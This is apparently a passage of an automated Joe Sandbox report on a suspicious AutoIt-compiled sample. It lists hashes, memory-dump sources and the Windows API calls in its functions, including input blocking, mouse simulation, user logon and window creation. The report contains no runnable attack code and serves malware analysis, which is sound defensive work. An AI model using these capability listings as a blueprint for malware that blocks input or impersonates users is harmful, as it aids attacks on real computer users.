                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 25b503819cd5da2603d66ad609f812779cf1ef38989e1f587fc5d648657dfa16
                                • Instruction ID: 2da5c1345dc9d05a479058585614a8c7ef496a4221149218b8e05fa58f9dc1ad
                                • Opcode Fuzzy Hash: 25b503819cd5da2603d66ad609f812779cf1ef38989e1f587fc5d648657dfa16
                                • Instruction Fuzzy Hash: D9322671D69F454DD7239634D83233AA259AFB73C4F26D73BE819B69A6EF28C4834100
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d63bbfeef18364624017ae41fce2c7a2898e9ab76d40608df38f0173d3df5576
                                • Instruction ID: e12f3f890b9a32ca222e64a0317a2c8f4825d78c38d880e1e71be4cba9880ef3
                                • Opcode Fuzzy Hash: d63bbfeef18364624017ae41fce2c7a2898e9ab76d40608df38f0173d3df5576
                                • Instruction Fuzzy Hash: 8DB1F221D2AF414DD3239639883133AB65CAFBB2C5F61D71BFC5671E62EB2185834241
                                APIs
                                • __time64.LIBCMT ref: 00B08B25
                                  • Part of subcall function 00AC543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00B091F8,00000000,?,?,?,?,00B093A9,00000000,?), ref: 00AC5443
                                  • Part of subcall function 00AC543A: __aulldiv.LIBCMT ref: 00AC5463
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Time$FileSystem__aulldiv__time64
                                • String ID:
                                • API String ID: 2893107130-0
                                • Opcode ID: e95948538e3f5a615509324bb74b609a53ceffbf527f90f6d90ff94f302fa309
                                • Instruction ID: 69a9f27c09b9c42561b995e196b0f8cddb33ddff65c5ac27783b9234133ca915
                                • Opcode Fuzzy Hash: e95948538e3f5a615509324bb74b609a53ceffbf527f90f6d90ff94f302fa309
                                • Instruction Fuzzy Hash: 8A21E7726355108BC329CF25D441B52B7E1EBA5321B288EACD0E6CB2D0CE75B945CB94
                                APIs
                                • BlockInput.USER32(00000001), ref: 00B14218
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: BlockInput
                                • String ID:
                                • API String ID: 3456056419-0
                                • Opcode ID: 72c222a8cfac91525e197db19fd417ce5f767e65f226fec0064e201d7dc194bb
                                • Instruction ID: 8711cfa53ee2d6ef48465a0535c86333f6d0a7b5693596a890f23ba92843be3e
                                • Opcode Fuzzy Hash: 72c222a8cfac91525e197db19fd417ce5f767e65f226fec0064e201d7dc194bb
                                • Instruction Fuzzy Hash: F7E01A312502149FC720AF59D844A9AB7E8EF997A0F008066F849C7262DBB0A8818BA0
                                APIs
                                • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00B04F18
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: mouse_event
                                • String ID:
                                • API String ID: 2434400541-0
                                • Opcode ID: 0d4904aa164854c1c4a09c2af4dba6a6c520ff619d4c3d262ee0f2b5da7869f1
                                • Instruction ID: f081f652229110035beea9186e988db77db68cf532e1b8d53a5395d8450f1af7
                                • Opcode Fuzzy Hash: 0d4904aa164854c1c4a09c2af4dba6a6c520ff619d4c3d262ee0f2b5da7869f1
                                • Instruction Fuzzy Hash: 6ED05EF016420738FC284B20AC0FF760988E341781F8449C93309C54E19EE5A890A034
                                APIs
                                • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00AF88D1), ref: 00AF8CB3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: LogonUser
                                • String ID:
                                • API String ID: 1244722697-0
                                • Opcode ID: bc7bfd651adc2666e6d617314b10724288dfe3552a03bf2ba49b75414d582741
                                • Instruction ID: 1a49a1affef8b40099f36160c720e83c957f38a4275a7c070a2c6635103a0ee2
                                • Opcode Fuzzy Hash: bc7bfd651adc2666e6d617314b10724288dfe3552a03bf2ba49b75414d582741
                                • Instruction Fuzzy Hash: 8FD05E3226050EABEF018EA4DD01EBF3B69EB04B01F408121FE15D60A1C775D835AB60
                                APIs
                                • GetUserNameW.ADVAPI32(?,?), ref: 00AE2242
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: NameUser
                                • String ID:
                                • API String ID: 2645101109-0
                                • Opcode ID: 9b01268286120ddf0d9c3c7e3143de4ce070ce765a27540bfbadbec2d2a48286
                                • Instruction ID: 4eea734f9fb80fc279f5d6f006beb0a656a82c538a1494d2e99367194c7fb7ca
                                • Opcode Fuzzy Hash: 9b01268286120ddf0d9c3c7e3143de4ce070ce765a27540bfbadbec2d2a48286
                                • Instruction Fuzzy Hash: FAC048F180011ADBEB15DFA0DA88DFFB7BCAB08304F2040A6A102F2100EB789B448A71
                                APIs
                                • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00ACA36A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: ExceptionFilterUnhandled
                                • String ID:
                                • API String ID: 3192549508-0
                                • Opcode ID: 780e662befd7809acdabf388aa2d7057a65fa59817722dee7dc90da89110370b
                                • Instruction ID: 378a82cade6a0532b3617b5a30313cdb83e2322770c2fb91f478cdb2c2821fe6
                                • Opcode Fuzzy Hash: 780e662befd7809acdabf388aa2d7057a65fa59817722dee7dc90da89110370b
                                • Instruction Fuzzy Hash: 91A0123000010DE78A001B41EC044547F6CD6001907004030F40C410218B3254114584
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 14fc5097fb9b3a73f24eac01ca6fc1222925827963709ccdcb426e845a5ca026
                                • Instruction ID: 3b5f76c5bac65d5813ea5fd5cf141ce4fcabd579f2a2c0677f34784782a523ba
                                • Opcode Fuzzy Hash: 14fc5097fb9b3a73f24eac01ca6fc1222925827963709ccdcb426e845a5ca026
                                • Instruction Fuzzy Hash: 02222B70A05619DBCF288B7CC4946BD7BBDEB02344F28446AE6528B593DB3CDD81DB90
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                • Instruction ID: 1c0590a22c36db8ae0089b57fe10d7e72b56c29260db7e70d8329878ae84f720
                                • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                • Instruction Fuzzy Hash: F2C16E322051930ADF2D87399474B3EBAE15AA27B131B076EE4B3DB5C5EF20D525E720
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                • Instruction ID: 8c61f2ceaed06827727afa99839bbf247a4ff855f12fd3ae414978f07dae4a2d
                                • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                • Instruction Fuzzy Hash: 1FC1703220919309DB6D473A8434B3EBAE15AA37B131B076EE4B2DB5D5EF20D535A720
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                • Instruction ID: 7b90a1fb2eabed22c3907786b196aef33ef025423f8ea83a59b175f660b0f846
                                • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                • Instruction Fuzzy Hash: AAC1713230919309DF2D473A9434A3EBAE15AA37B131B076EE4B3CB5C6EF20D5359660
                                APIs
                                • CharUpperBuffW.USER32(?,?,00B2F910), ref: 00B238AF
                                • IsWindowVisible.USER32(?), ref: 00B238D3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: BuffCharUpperVisibleWindow
                                • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                • API String ID: 4105515805-45149045
                                • Opcode ID: 39e9a037ecb798c6f0123170646d4680258b99109a07031d4ec384e884eb47df
                                • Instruction ID: 8ecab24780424ab602edaea18ca30a61d722341d8fba73aafebaa38475a46df0
                                • Opcode Fuzzy Hash: 39e9a037ecb798c6f0123170646d4680258b99109a07031d4ec384e884eb47df
                                • Instruction Fuzzy Hash: DBD17E30204315DFCB14EF10D691F6AB7E5EF95B44F1148ACB88A5B3A2CB25EE4ACB41
                                APIs
                                • SetTextColor.GDI32(?,00000000), ref: 00B2A89F
                                • GetSysColorBrush.USER32(0000000F), ref: 00B2A8D0
                                • GetSysColor.USER32(0000000F), ref: 00B2A8DC
                                • SetBkColor.GDI32(?,000000FF), ref: 00B2A8F6
                                • SelectObject.GDI32(?,?), ref: 00B2A905
                                • InflateRect.USER32(?,000000FF,000000FF), ref: 00B2A930
                                • GetSysColor.USER32(00000010), ref: 00B2A938
                                • CreateSolidBrush.GDI32(00000000), ref: 00B2A93F
                                • FrameRect.USER32(?,?,00000000), ref: 00B2A94E
                                • DeleteObject.GDI32(00000000), ref: 00B2A955
                                • InflateRect.USER32(?,000000FE,000000FE), ref: 00B2A9A0
                                • FillRect.USER32(?,?,?), ref: 00B2A9D2
                                • GetWindowLongW.USER32(?,000000F0), ref: 00B2A9FD
                                  • Part of subcall function 00B2AB60: GetSysColor.USER32(00000012), ref: 00B2AB99
                                  • Part of subcall function 00B2AB60: SetTextColor.GDI32(?,?), ref: 00B2AB9D
                                  • Part of subcall function 00B2AB60: GetSysColorBrush.USER32(0000000F), ref: 00B2ABB3
                                  • Part of subcall function 00B2AB60: GetSysColor.USER32(0000000F), ref: 00B2ABBE
                                  • Part of subcall function 00B2AB60: GetSysColor.USER32(00000011), ref: 00B2ABDB
                                  • Part of subcall function 00B2AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B2ABE9
                                  • Part of subcall function 00B2AB60: SelectObject.GDI32(?,00000000), ref: 00B2ABFA
                                  • Part of subcall function 00B2AB60: SetBkColor.GDI32(?,00000000), ref: 00B2AC03
                                  • Part of subcall function 00B2AB60: SelectObject.GDI32(?,?), ref: 00B2AC10
                                  • Part of subcall function 00B2AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 00B2AC2F
                                  • Part of subcall function 00B2AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B2AC46
                                  • Part of subcall function 00B2AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 00B2AC5B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                • String ID:
                                • API String ID: 4124339563-0
                                • Opcode ID: dfdc6b4a10e0f5465f578a530de374857d88fb2f1c52ae14f55507b192ee8105
                                • Instruction ID: 0f5c80e6e67e808527cf7e060bc7d2f2cfa448373b8ddbf651776cdcc07170cf
                                • Opcode Fuzzy Hash: dfdc6b4a10e0f5465f578a530de374857d88fb2f1c52ae14f55507b192ee8105
                                • Instruction Fuzzy Hash: B6A18C72408312AFD7209F64DC48E6B7BF9FF89321F104A29F966971A1DB34D846CB52
                                APIs
                                • DestroyWindow.USER32(?,?,?), ref: 00AA2CA2
                                • DeleteObject.GDI32(00000000), ref: 00AA2CE8
                                • DeleteObject.GDI32(00000000), ref: 00AA2CF3
                                • DestroyIcon.USER32(00000000,?,?,?), ref: 00AA2CFE
                                • DestroyWindow.USER32(00000000,?,?,?), ref: 00AA2D09
                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 00ADC68B
                                • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00ADC6C4
                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00ADCAED
                                  • Part of subcall function 00AA1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00AA2036,?,00000000,?,?,?,?,00AA16CB,00000000,?), ref: 00AA1B9A
                                • SendMessageW.USER32(?,00001053), ref: 00ADCB2A
                                • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00ADCB41
                                • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00ADCB57
                                • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00ADCB62
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                • String ID: 0
                                • API String ID: 464785882-4108050209
                                • Opcode ID: b2e17c43deb37d81f0d9722364048c65b9c8cb0167164138de8d843d9ddbbeea
                                • Instruction ID: 4e2b1b76d3d0ec5405b4496eb6b7198d49d9130bf3133fe61a63fe0a0511f6b6
                                • Opcode Fuzzy Hash: b2e17c43deb37d81f0d9722364048c65b9c8cb0167164138de8d843d9ddbbeea
                                • Instruction Fuzzy Hash: 45128E30604202EFDB25CF28C984BA9B7F5BF45320F94457AE496DB6A2CB31EC52DB51
                                APIs
                                • DestroyWindow.USER32(00000000), ref: 00B177F1
                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00B178B0
                                • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00B178EE
                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00B17900
                                • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00B17946
                                • GetClientRect.USER32(00000000,?), ref: 00B17952
                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00B17996
                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00B179A5
                                • GetStockObject.GDI32(00000011), ref: 00B179B5
                                • SelectObject.GDI32(00000000,00000000), ref: 00B179B9
                                • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00B179C9
                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B179D2
                                • DeleteDC.GDI32(00000000), ref: 00B179DB
                                • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00B17A07
                                • SendMessageW.USER32(00000030,00000000,00000001), ref: 00B17A1E
                                • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00B17A59
                                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00B17A6D
                                • SendMessageW.USER32(00000404,00000001,00000000), ref: 00B17A7E
                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00B17AAE
                                • GetStockObject.GDI32(00000011), ref: 00B17AB9
                                • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00B17AC4
                                • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00B17ACE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
